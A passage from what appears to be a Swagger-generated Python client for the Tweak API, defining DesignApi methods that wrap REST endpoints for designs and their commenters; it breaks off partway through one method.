tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
tweak-api
Tweak API to integrate with all the Tweak services. You can find out more about Tweak at <a href='https://www.tweak.com'>https://www.tweak.com</a>, #tweak.
OpenAPI spec version: 1.0.8-beta.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class DesignApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Bind an ApiClient: the one given, or the shared default from config."""
    config = Configuration()
    if not api_client:
        # Lazily create the shared default client on first use.
        if not config.api_client:
            config.api_client = ApiClient()
        api_client = config.api_client
    self.api_client = api_client
def designs_change_stream_get(self, **kwargs):
    """
    Create a change stream.

    Synchronous by default; supply a `callback` function to run
    asynchronously, in which case the request thread is returned and the
    callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str options:
    :return: file
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.designs_change_stream_get_with_http_info(**kwargs)
    (data) = self.designs_change_stream_get_with_http_info(**kwargs)
    return data
def designs_change_stream_get_with_http_info(self, **kwargs):
    """
    Create a change stream.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_change_stream_get_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str options:
    :return: file
        If the method is called asynchronously,
        returns the request thread.
    """

    all_params = ['options']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # `params` snapshots self + kwargs; explicit kwargs are folded in below.
    params = locals()
    # Reject any keyword argument this endpoint does not declare.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_change_stream_get" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    # '{format}' in the template is fixed to json by the generator.
    resource_path = '/Designs/change-stream'.replace('{format}', 'json')
    path_params = {}

    query_params = {}
    # Optional query parameter.
    if 'options' in params:
        query_params['options'] = params['options']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='file',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_change_stream_post(self, **kwargs):
    """
    Create a change stream.

    Synchronous by default; supply a `callback` function to run
    asynchronously, in which case the request thread is returned and the
    callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str options:
    :return: file
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.designs_change_stream_post_with_http_info(**kwargs)
    (data) = self.designs_change_stream_post_with_http_info(**kwargs)
    return data
def designs_change_stream_post_with_http_info(self, **kwargs):
    """
    Create a change stream.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_change_stream_post_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str options:
    :return: file
        If the method is called asynchronously,
        returns the request thread.
    """

    all_params = ['options']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # `params` snapshots self + kwargs; explicit kwargs are folded in below.
    params = locals()
    # Reject any keyword argument this endpoint does not declare.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_change_stream_post" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    # '{format}' in the template is fixed to json by the generator.
    resource_path = '/Designs/change-stream'.replace('{format}', 'json')
    path_params = {}

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}
    # POST variant sends `options` in the form body, not the query string.
    if 'options' in params:
        form_params.append(('options', params['options']))

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='file',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_count_get(self, **kwargs):
    """
    Count instances of the model matched by where from the data source.

    Synchronous by default; supply a `callback` function to run
    asynchronously, in which case the request thread is returned and the
    callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str where: Criteria to match model instances
    :return: InlineResponse2001
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.designs_count_get_with_http_info(**kwargs)
    (data) = self.designs_count_get_with_http_info(**kwargs)
    return data
def designs_count_get_with_http_info(self, **kwargs):
    """
    Count instances of the model matched by where from the data source.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_count_get_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str where: Criteria to match model instances
    :return: InlineResponse2001
        If the method is called asynchronously,
        returns the request thread.
    """

    all_params = ['where']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # `params` snapshots self + kwargs; explicit kwargs are folded in below.
    params = locals()
    # Reject any keyword argument this endpoint does not declare.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_count_get" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    # '{format}' in the template is fixed to json by the generator.
    resource_path = '/Designs/count'.replace('{format}', 'json')
    path_params = {}

    query_params = {}
    # Optional filter criteria.
    if 'where' in params:
        query_params['where'] = params['where']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='InlineResponse2001',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_find_one_get(self, **kwargs):
    """
    Find first instance of the model matched by filter from the data source.

    Synchronous by default; supply a `callback` function to run
    asynchronously, in which case the request thread is returned and the
    callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
    :return: Design
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.designs_find_one_get_with_http_info(**kwargs)
    (data) = self.designs_find_one_get_with_http_info(**kwargs)
    return data
def designs_find_one_get_with_http_info(self, **kwargs):
    """
    Find first instance of the model matched by filter from the data source.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_find_one_get_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
    :return: Design
        If the method is called asynchronously,
        returns the request thread.
    """

    all_params = ['filter']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # `params` snapshots self + kwargs; explicit kwargs are folded in below.
    params = locals()
    # Reject any keyword argument this endpoint does not declare.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_find_one_get" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    # '{format}' in the template is fixed to json by the generator.
    resource_path = '/Designs/findOne'.replace('{format}', 'json')
    path_params = {}

    query_params = {}
    # Optional JSON-encoded filter string.
    if 'filter' in params:
        query_params['filter'] = params['filter']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Design',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_get(self, **kwargs):
    """
    Find all instances of the model matched by filter from the data source.

    Synchronous by default; supply a `callback` function to run
    asynchronously, in which case the request thread is returned and the
    callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
    :return: list[Design]
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.designs_get_with_http_info(**kwargs)
    (data) = self.designs_get_with_http_info(**kwargs)
    return data
def designs_get_with_http_info(self, **kwargs):
    """
    Find all instances of the model matched by filter from the data source.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_get_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
    :return: list[Design]
        If the method is called asynchronously,
        returns the request thread.
    """

    all_params = ['filter']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # `params` snapshots self + kwargs; explicit kwargs are folded in below.
    params = locals()
    # Reject any keyword argument this endpoint does not declare.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_get" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    # '{format}' in the template is fixed to json by the generator.
    resource_path = '/Designs'.replace('{format}', 'json')
    path_params = {}

    query_params = {}
    # Optional JSON-encoded filter string.
    if 'filter' in params:
        query_params['filter'] = params['filter']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='list[Design]',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_approve_post(self, id, id2, **kwargs):
    """
    Approve design

    Synchronous by default; supply a `callback` function to run
    asynchronously, in which case the request thread is returned and the
    callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str id2: Customer id (required)
    :return: Design
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.designs_id_approve_post_with_http_info(id, id2, **kwargs)
    (data) = self.designs_id_approve_post_with_http_info(id, id2, **kwargs)
    return data
def designs_id_approve_post_with_http_info(self, id, id2, **kwargs):
    """
    Approve design
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_approve_post_with_http_info(id, id2, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str id2: Customer id (required)
    :return: Design
        If the method is called asynchronously,
        returns the request thread.
    """

    all_params = ['id', 'id2']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # `params` snapshots self + named args + kwargs; kwargs folded in below.
    params = locals()
    # Reject any keyword argument this endpoint does not declare.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_approve_post" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_approve_post`")
    # verify the required parameter 'id2' is set
    if ('id2' not in params) or (params['id2'] is None):
        raise ValueError("Missing the required parameter `id2` when calling `designs_id_approve_post`")

    collection_formats = {}

    resource_path = '/Designs/{id}/approve'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    if 'id2' in params:
        # BUG FIX: was `path_params['id'] = params['id2']`, which clobbered
        # the design id with the customer id before the path was built.
        # NOTE(review): the path template has no '{id2}' placeholder --
        # confirm how the generated client is meant to transmit id2.
        path_params['id2'] = params['id2']

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Design',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_assignee_get(self, id, **kwargs):
    """
    Fetches belongsTo relation assignee.

    Synchronous by default; supply a `callback` function to run
    asynchronously, in which case the request thread is returned and the
    callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param bool refresh:
    :return: TeamMember
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.designs_id_assignee_get_with_http_info(id, **kwargs)
    (data) = self.designs_id_assignee_get_with_http_info(id, **kwargs)
    return data
def designs_id_assignee_get_with_http_info(self, id, **kwargs):
    """
    Fetches belongsTo relation assignee.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_assignee_get_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param bool refresh:
    :return: TeamMember
        If the method is called asynchronously,
        returns the request thread.
    """

    all_params = ['id', 'refresh']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # `params` snapshots self + named args + kwargs; kwargs folded in below.
    params = locals()
    # Reject any keyword argument this endpoint does not declare.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_assignee_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_assignee_get`")

    collection_formats = {}

    # '{format}' in the template is fixed to json by the generator.
    resource_path = '/Designs/{id}/assignee'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']

    query_params = {}
    # Optional cache-bypass flag.
    if 'refresh' in params:
        query_params['refresh'] = params['refresh']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='TeamMember',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_commenters_count_get(self, id, **kwargs):
    """
    Counts commenters of Design.

    Synchronous by default; supply a `callback` function to run
    asynchronously, in which case the request thread is returned and the
    callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str where: Criteria to match model instances
    :return: InlineResponse2001
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.designs_id_commenters_count_get_with_http_info(id, **kwargs)
    (data) = self.designs_id_commenters_count_get_with_http_info(id, **kwargs)
    return data
def designs_id_commenters_count_get_with_http_info(self, id, **kwargs):
    """
    Counts commenters of Design.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_commenters_count_get_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str where: Criteria to match model instances
    :return: InlineResponse2001
        If the method is called asynchronously,
        returns the request thread.
    """

    all_params = ['id', 'where']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # `params` snapshots self + named args + kwargs; kwargs folded in below.
    params = locals()
    # Reject any keyword argument this endpoint does not declare.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_commenters_count_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_count_get`")

    collection_formats = {}

    # '{format}' in the template is fixed to json by the generator.
    resource_path = '/Designs/{id}/commenters/count'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']

    query_params = {}
    # Optional filter criteria.
    if 'where' in params:
        query_params['where'] = params['where']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='InlineResponse2001',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_commenters_delete(self, id, **kwargs):
    """
    Deletes all commenters of this model.

    Runs synchronously and returns the response payload. Pass a
    `callback` callable (invoked with the response) to run the request
    asynchronously; the request thread is then returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Ask the detailed variant for just the payload rather than the full
    # (data, status, headers) tuple; with a callback it hands back the
    # request thread, which is passed through unchanged.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_commenters_delete_with_http_info(id, **kwargs)
def designs_id_commenters_delete_with_http_info(self, id, **kwargs):
    """
    Deletes all commenters of this model.

    Synchronous by default; supply a `callback` callable via kwargs to
    make the request asynchronously, in which case the request thread
    is returned and the callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Collect recognised arguments, rejecting anything unexpected.
    allowed = ['id', 'callback', '_return_http_data_only']
    params = {'id': id}
    for name, value in kwargs.items():
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_commenters_delete" % name
            )
        params[name] = value
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_delete`")

    # Content negotiation: omit Accept entirely when nothing is selected.
    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/commenters'.replace('{format}', 'json'), 'DELETE',
        {'id': params['id']},
        {},
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type=None,
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_commenters_fk_delete(self, id, fk, **kwargs):
    """
    Delete a related item by id for commenters.

    Runs synchronously and returns the response payload. Pass a
    `callback` callable (invoked with the response) to run the request
    asynchronously; the request thread is then returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for commenters (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the detailed variant, requesting only the payload;
    # a supplied callback makes it return the request thread instead.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_commenters_fk_delete_with_http_info(id, fk, **kwargs)
def designs_id_commenters_fk_delete_with_http_info(self, id, fk, **kwargs):
    """
    Delete a related item by id for commenters.

    Synchronous by default; supply a `callback` callable via kwargs to
    make the request asynchronously, in which case the request thread
    is returned and the callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for commenters (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Collect recognised arguments, rejecting anything unexpected.
    allowed = ['id', 'fk', 'callback', '_return_http_data_only']
    params = {'id': id, 'fk': fk}
    for name, value in kwargs.items():
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_commenters_fk_delete" % name
            )
        params[name] = value
    # Both path parameters are mandatory.
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_fk_delete`")
    if params['fk'] is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_commenters_fk_delete`")

    # Content negotiation: omit Accept entirely when nothing is selected.
    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/commenters/{fk}'.replace('{format}', 'json'), 'DELETE',
        {'id': params['id'], 'fk': params['fk']},
        {},
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type=None,
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_commenters_fk_get(self, id, fk, **kwargs):
    """
    Find a related item by id for commenters.

    Runs synchronously and returns the response payload. Pass a
    `callback` callable (invoked with the response) to run the request
    asynchronously; the request thread is then returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for commenters (required)
    :return: TeamMember
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the detailed variant, requesting only the payload;
    # a supplied callback makes it return the request thread instead.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_commenters_fk_get_with_http_info(id, fk, **kwargs)
def designs_id_commenters_fk_get_with_http_info(self, id, fk, **kwargs):
    """
    Find a related item by id for commenters.

    Synchronous by default; supply a `callback` callable via kwargs to
    make the request asynchronously, in which case the request thread
    is returned and the callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for commenters (required)
    :return: TeamMember
             If the method is called asynchronously,
             returns the request thread.
    """
    # Collect recognised arguments, rejecting anything unexpected.
    allowed = ['id', 'fk', 'callback', '_return_http_data_only']
    params = {'id': id, 'fk': fk}
    for name, value in kwargs.items():
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_commenters_fk_get" % name
            )
        params[name] = value
    # Both path parameters are mandatory.
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_commenters_fk_get`")
    if params['fk'] is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_commenters_fk_get`")

    # Content negotiation: omit Accept entirely when nothing is selected.
    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/Designs/{id}/commenters/{fk}'.replace('{format}', 'json'), 'GET',
        {'id': params['id'], 'fk': params['fk']},
        {},
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='TeamMember',
        auth_settings=['access_token'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        collection_formats={})
def designs_id_commenters_fk_put(self, id, fk, **kwargs):
    """
    Update a related item by id for commenters.

    Runs synchronously and returns the response payload. Pass a
    `callback` callable (invoked with the response) to run the request
    asynchronously; the request thread is then returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for commenters (required)
    :param TeamMember data:
    :return: TeamMember
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the detailed variant, requesting only the payload;
    # a supplied callback makes it return the request thread instead.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_commenters_fk_put_with_http_info(id, fk, **kwargs)
def designs_id_commenters_fk_put_with_http_info(self, id, fk, **kwargs):
    """
    Update a related item by id for commenters.

    Synchronous by default; supply a `callback` callable via kwargs to
    make the request asynchronously, in which case the request thread
    is returned and the callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for commenters (required)
    :param TeamMember data:
    :return: TeamMember
             If the method is called asynchronously,
             returns the request thread.
    """
    # Collect recognised arguments, rejecting anything unexpected.
    allowed = ['id', 'fk', 'data', 'callback', '_return_http_data_only']
    params = {'id': id, 'fk': fk}
